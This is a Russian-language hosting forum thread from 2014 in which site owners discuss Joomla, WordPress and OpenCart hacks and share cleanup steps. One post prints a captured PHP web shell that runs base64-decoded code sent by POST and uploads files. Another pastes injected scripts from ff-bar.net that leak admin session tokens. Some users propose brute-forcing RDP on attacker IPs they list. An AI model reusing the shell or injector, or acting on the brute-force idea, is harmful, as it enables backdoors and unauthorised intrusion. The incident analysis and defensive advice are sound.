Хакнули! Наконец-то :)

[Denys]

У меня на джумле по мимо очистки и т.д., нашел "mod_confirmation", лежал себе там спокойно, в теперь внимание, перейдите по ссылке!))) 

нашел в google что по поиску только вот этот выдает,и не понятно, то ли они причастны, то ли тоже жертва

http://sjtorres.com/blah

 

еще "mod_administrator"

Насколько мне известно, это сторонние модули, так что если они вас смущают можно смело удалить файло и проверить в бд нет ли хвостов с аналогичным названием. 

[veacheslav]

Насколько мне известно, это сторонние модули, так что если они вас смущают можно смело удалить файло и проверить в бд нет ли хвостов с аналогичным названием. 

 

Так я и пишу.

1) Эта штука создает свои файлы по пути:  .../plugins/system/widgetkit_zoo/widgets

    в каждой папке виджетов

2) Нашел в папке модулей в "якобы" модуля  "mod_confirmation" и  "mod_administrator"

[aleksandr8]

Аналогично хакнули где то в конце декабря. Заметил, когда уже пришли абузы на маилспам от AOL и SpamCop. По поведению видно, что хакает кто то один, а потом продает, и уже кому как попадет: кому то заливают JS фреймы, у меня с дедика устроили спам по sendmail, однако ни в один домен не делали никаких вставок ифреймов. Но проверяли запись в морду сайта (сделан touch index.php). 

 

Влезли на 99% через Joomla, т.к. вордпресс вообще не тронут, да и он был самый последний.

Может через уязвимые модули, может через брутфорс (менее вероятно). Пароли FTP/SSH можете не менять, 100% все делалось через HTTP конкретно в этом случае.

Но явно через админку, т.к. тоже залиты  "mod_confirmation" и  "mod_administrator". А это делается, чтобы получить ПХП шелл, имея доступ к админке Joomla.

 

Находится все grep ом, и слава богу, потому что ПХП позволяет написать закладку (бэкдор) так, что никакие утилиты уже не помогут, только побайтное сравнение всех скриптов с бэкапом, если он есть.

 

Кусок шелла, коих было штук 100 копий:

$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
 $isevalfunctionavailable = false;
 $evalcheck = "\$isevalfunctionavailable = true;";
 @eval($evalcheck);
 if ($isevalfunctionavailable === true) {
    $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

    $fv = $fnsdht($_POST["gjwqweodsa"]);
    @eval($fv);
    //@eval($_POST["gjwqweodsa"]);
 }else{
    $mpath =  realpath("")."/";
    //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
    if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
        @include_once($mpath."dsadasdsa1fag1.php");
        @unlink($mpath."dsadasdsa1fag1.php");
    }else{
        echo "ERROR! CANT DO NOTHING!";
    }
 }
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
  $fname = trim($_POST['fname']);
  $save_type = trim($_POST['save_type']);
  $dirname = trim($_POST['dirname']);
  $namecrt = trim($_POST['namecrt']);

  $auth_pass = trim($_POST['auth_pass']);
  $change_pass = trim($_POST['change_pass']);

  $file_type = trim($_POST['file_type']);
  $ftdata = trim($_POST['ftdata']);
  $is_sh = trim($_POST['is_sh']);

  if($namecrt == "random"){
    $fname = make_name($fname);
  }
  $uploadfile = "";

  if($save_type == "same_dir"){
    $uploadfile = realpath("")."/". $fname;
  }else if($save_type == "sub_dir"){
    $uploadfile = realpath("")."/$dirname/". $fname;
    if(!@mkdir(realpath("")."/$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    if(@is_writable($root)){
        $uploadfile = $root.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root_in_dir"){

Кстати, так и не нашел какой конкретно скрипт занимался маилспамом, откуда брал задания и т.д, так как раньше все снес. Но нашел способ, как отследить через sendmail, какой именно скрипт пхп отправил конкретное письмо (гуглится на stackoverflow типа "find who calling sendmail"). Действительно работает.

 

Забыл добавить:

Для джумлы закройте просто папку administrator http авторизацией с паролем отличным от пароля админа. Если вычистили все пхп шеллы, должно помочь.

[motorostov]

на сервере IHC.RU сделали PHP пароль а меня взломали после 

[scuter463]

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

У меня sweb, и тоже 2 сайта заразились один на joomla второй на Opencart. Пока тоже решение не нашел.

[Zeppelin]

Я сделал все очень просто.

- скачал сайт на виртуалку

- отключил антивирусы

- с помощью AI-Bolit просканил весь сайт

- удалил весь хлям

- выполнил полный скан

- прогнал еще раз через несколько антивиров

- забил контрольные суммы файлов, которые нормальные НО AI-Bolit считает их подозрительными в файл паттернов, подключил этот файл, я брал для oscommers

- еще раз прогнал  AI-Bolit

- увел лог работы AI-Bolit в отдельную директорию, защищенную .htaccess

- переименовал файл AI-Bolit в произвольный *,php 

- создал задание для CRON с запуском раз в сутки и отправкой на почту отчета работы

 

лечить это не способно, но лишний раз поспать не даст, если снова хакнут :)

[razumovskij]

Интересно читает сейчас эту тему та сво..чь которой жить скучно... :angry:

 

Скажу лично о Joomla (около 35 сайтов на VDS серевре , не shared хостинг)

Первый хак был между 25 и 29 декабря.. 

Повтороное "нападение" 31-го , 2го и 5-го Января. Особая активность 9-го числа (только почистил index.php через 2 минуты код опять на месте)

Как результат в тот же день один из сайтов поулчил от гугла предупреждение

 

файлы типа - xQTOpnd.php в основном влелати в папки с системными плагинами - Widgetkit , Bootstrap , shlib. Причем дата можификации папки не везде поменялась. Вручную тяжело было все выявить

 

Провайдер все перепроверил 10 раз , мол не через CPanel хак был

 

Зашел в журнал посещений и обнаружил , что эта "дрянь" сидит делает запросы на свои файлы (даже на те которые уже удалил)

Плюс логи показали что было большое количество попыток входа через админ панель сайта

IP разные - UK , USA , Россия , Украина и т.д

 

Самое интересное , что не тронут сайт который висит на public_html и сайты у которых назавния папок не совпадает с доменным имененм (т.е. домен - www.site.com , а название папки где лежит сайт - tratata )

 

По рекомендации провайдера - полностью отключил доступ через ФТП (пользуюсь только CPanel) , закрыл дополнительным паролем папку administrator , переименовал папки 

 

Пока тьфу тьфу все нормально

[Mehanic]

Я вот что думаю, я тут из логов натягал айпишников, с которых гамном бросаются, и на некоторых из них открыты порты RDP, никто не хочет сбрутфорсить паролик, а потом размотать это дело? У нас служба безопасности готова выехать на место, если чО. Само собой для начала ip из логов сравним, ну и выберем какие совпадут.

[motorostov]

Как ранее говорил у меня несколько сайтов на площадке Joomla. InstantCMS, Wordpress. Opencad. Так вот думал что полезли из InstantCMS, заблокировал сайт, Opencad перенёс на другой хостинг и почистил облачным антивирусом virusdie.ru, он нашёл 5 вирусов каких то shell, я в этом не разбираюсь, и удалил их. Затем прогнал через поиск вирусов посредством хостинга webhost1.ru, у них есть такая кнопочка), антивирус хостинга перестал ругаться на вирусы. После этого я выполнил обновление Opencad до Версия 1.5.5.1.1 и подумал что всё закончилось. Так вот сегодня в 3 часа 18 минут меня снова взломали и Причём только Opencad, а сайты Joomla. InstantCMS, Wordpress на другом хосте остались нетронутые.Тот же самый код, только в нём ссылка на другой сайт с распространением какой то вирусной программы для планшетов и смартфонов. virusdie.ru нашёл опять вирус на сайте только уже не 5 а 3 шт. в файлах index.php и удалил его опять. Кстати и у меня Особая активность 9-го числа (только почистил index.php через 2 минуты код опять на месте). время изменения у всех файлов index.php 3 часа 18 минут секунда в секунду. Значит как я понимаю это делается не в ручную, а автоматом, и ноги растут только из Opencad.

[costas]

Как ранее говорил у меня несколько сайтов на площадке Joomla. InstantCMS, Wordpress. Opencad. Так вот думал что полезли из InstantCMS, заблокировал сайт, Opencad перенёс на другой хостинг и почистил облачным антивирусом virusdie.ru, он нашёл 5 вирусов каких то shell, я в этом не разбираюсь, и удалил их. Затем прогнал через поиск вирусов посредством хостинга webhost1.ru, у них есть такая кнопочка), антивирус хостинга перестал ругаться на вирусы. После этого я выполнил обновление Opencad до Версия 1.5.5.1.1 и подумал что всё закончилось. Так вот сегодня в 3 часа 18 минут меня снова взломали и Причём только Opencad, а сайты Joomla. InstantCMS, Wordpress на другом хосте остались нетронутые.Тот же самый код, только в нём ссылка на другой сайт с распространением какой то вирусной программы для планшетов и смартфонов. virusdie.ru нашёл опять вирус на сайте только уже не 5 а 3 шт. в файлах index.php и удалил его опять. Кстати и у меня Особая активность 9-го числа (только почистил index.php через 2 минуты код опять на месте). время изменения у всех файлов index.php 3 часа 18 минут секунда в секунду. Значит как я понимаю это делается не в ручную, а автоматом, и ноги растут только из Opencad.

OpenCart из коробки взломать не возможно, в архитектуре движка нет даже намёка на инжекты, если Вас ломают значит у Вас стоят сторонние модули-темы которые взяты непонятно где, или Вы не до конца вычистили код от вирусов, возможно у Вас имеются посторонние файлы не относящиеся к движку магазина посредством которых и осуществляется инжект кода.

[razumovskij]

Я вот что думаю, я тут из логов натягал айпишников, с которых гамном бросаются, и на некоторых из них открыты порты RDP, никто не хочет сбрутфорсить паролик, а потом размотать это дело? У нас служба безопасности готова выехать на место, если чО. Само собой для начала ip из логов сравним, ну и выберем какие совпадут.

 

31.221.71.132

[costas]

31.221.71.132

Англия, Лондон - удачно съездить...

[Mehanic]

193.105.154.237
91.231.87.87
88.74.156.32
185.24.218.83
5.10.83.40
37.9.53.103
80.83.224.6

 

Это виртуальные машины. На некоторых открыт рдп порт, 3 на вин2003сервер, одна на вин2008р2, ломануть пароли и посмотреть впн сессии, глядишь может что и проклюнется. География очень разбросана, отсюда вывод о виртуальных машинах, а то что Лондон, то далеко не факт что это и есть начальный и конечный комп.

[motorostov]

удалил единственный бесплатный сторонний модуль Call Me, остался только платный модуль от eDOST службы расчёта доставки, шаблон стандартный, всёравно влезли.

[motorostov]

а где айпишники смотреть?

[motorostov]

31.23.20.115

31.23.251.120

95.153.198.180

46.41.127.247

95.153.198.209

194.226.109.254

 

как то странно, взлом произошёл в 19:17:04 а в этом промежутке по логам ничего нет причём провал в несколько часов, и утренний взлом тоже с провалом по логам

взломали между этими логами 

[2014-01-12 20:03:56]  31.23.20.115 

[2014-01-12 13:20:07] logged 31.23.251.120 sess=94056435417478cd107294114cf2f8a0&to=orders&type=1

[dmibobkov]

удалил единственный бесплатный сторонний модуль Call Me

 

Стоит этот модуль пол года, всё гуд.

[seleve]

отбился от бед ручным способом. (сайты находились под одним аккаунтом у меня, все были хакнуты (в основном под взлом попали joomla, частично затянуло WP))

1. удалил со всех сайтов файл sys09725827.php  - файл рассылки спама

2. выкачивал сайты и восстанавливал index-ы (искал по всей директории исходный код начинающийся с "    /*CORE include code version:1.23 START*/    ")  - этот код перенаправлял клиентов на другие сайты

3. искал левые файлы которые сами создавались в разных директориях и удалял их, искал по фразе "$ftdata = base64_decode($ftdata);"

4. у WP заметил в index-ах код начинающийся на "$GLOBALS['QOQQ']"  - не знаю что он делал, но тоже все снёс.

ps: ещё в WP нашел гадость начинающуюся с "$GLOBALS["loryrw"]"  - тоже удалил всё

5. заливал сайты на отдельные аккаунты

 

для быстрого восстановления доверия у yandex и google (чтобы они сняли метки об вирусных сайтах) подтверждал право владения сайтами и отправлял запросы на проверку на вирусы, в течении 24 часов, сайты работали уже в штатном режиме.

[sp4m3rXXX]

Поймал такую же гадость на своем сайте. 1 акаунт, 2 сайта, оба joomla 2.5.17. Для чего, не помню для чего, по ftp был залит phpmyadmin в корень одного из сайтов, собственно после этого все и понеслось. Долго ломал голову и не мог найти в чем проблема, где подмена файлов или скриптов движка или дополнений. Набор плагинов и модулей одинаков на обоих сайтах - к одному цепляется зараза к другому - нет. Вчера вечером удалил из корня phpmyadmin сайта-страдальца - больше зараза в index.php не прописывается... пока. Слежу за развитием событий. Но уверенность в том что виноват был

phpMyAdmin-3.5.8.2-english (скачан с офсайта) крепчает. Пароли не менял после удаления ни к бд ни к ftp.

З.Ы. Как Я понял скрипт прописывается 2 раза в сутки, утром и вечером. Утром не могу поймать время, а вечером в районе 19-00 по МСК.

Вот такая вот ситуевина, Панове!

[Mehanic]

По моему атаки прекратились, но не факт что надолго, это как была передышка  с 5 по 9 января, но это сугубо субъективное мнение. У меня на акке 4 сайта, 3 на джумле 1,5, 1 на 2,5, 2 постоянно засирали в последнее время, никаких доп модулей не ставил, вирусня в основном в плагин систем ннмфреймворк лезла, чистил вручную, менял права, закрывал админки, менял пароли, но как только повторялись атаки, все снова засиралось. Обратил внимание, что 2 сайта (оба на 1,5) не вирусились вообще, хотя права стояли везде 755. Шеллы плодились аки кролики, замучился убивать, также постоянно появлялась строка /*CORE include code version:1.23 START*/, пока ее не вычистил из всех мест где нашел, по 2-3 раза в день приходилось вычищать всякую дрянь.

[motorostov]

вроде разобрались с этой гадостью, только я заметил во всех описаниях товаров вставлен скрипт

<p>
	<script src="http://ff-bar.net/code.js" type="text/javascript">
	</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=1337&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/insert%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/insert%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
	</script></p>
<script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=6105&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D403%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D403%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script><script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=1392&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D404%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D404%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script><script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=1816&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D407%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D407%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script><script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=1010&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D408%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D408%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script><script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=2056&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D408%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D408%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script><script src="http://ff-bar.net/code.js" type="text/javascript">
</script><script src="http://ffbar.net/code.php?id=123&j=0&rnd=5547&h=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D412%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&r=http%3A//magmir.com/admin/index.php%3Froute%3Dcatalog/product/update%26token%3D3b4fd26022b68a7c027c1f5dfd2f6975%26product_id%3D412%26filter_name%3D%25D0%25BA%25D0%25BB%25D0%25B0&t=Rich%20text%20editor%2C%20description1%2C%20press%20ALT%200%20for%20help." type="text/javascript">
</script>

я не понимаю зачем он нужен, сейчас удаляю из всех товаров.

[Zeppelin]

если я правильно понял, этот скрипт перехватывает пароли к админке magmir.com

[motorostov]

думаю да

[motorostov]

только не пойму как воабще его разместили в товарах

[Zeppelin]

попробуй такой финт :)

на форуме, по моему даже в факе есть инфа, как переименовать админку.

- переименуй админку в произвольное имя

- директорию admin оставь, но создай в ней файл .htaccess и более ничего

 

.htaccess

Order deny,allow
Deny from all

и посмотри что будет

если придет новая зараза и уже для новой админки, будем думать дальше.

Змінено 15 січня 2014 користувачем Zeppelin